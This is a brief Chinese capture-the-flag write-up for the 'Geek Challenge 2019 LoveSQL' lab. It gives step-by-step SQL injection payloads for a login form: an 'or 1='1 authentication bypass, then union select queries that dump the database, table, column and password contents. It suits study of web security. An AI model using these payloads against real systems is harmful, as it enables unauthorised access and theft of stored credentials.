启动环境
输入1 1尝试登录
在源码处显示
尝试万能密码
username=1&password='or 1='1 %23
得到
order by一下
发现4的时候报错
爆数据库
username=1&password='union select 1,2,database()
得到数据库名:geek
爆表名
username=1&password='union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = ‘geek’%23
两张表 geekuser 10velysql
爆字段
username=1&password='union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = ‘geek’%23
先看第二张表吧
username=1&password='union select 1,2,group_concat(password) from l0ve1ysq1 %23
直接拿到flag
极客大挑战 2019 lovesql wp
最新推荐文章于 2024-07-23 14:05:29 发布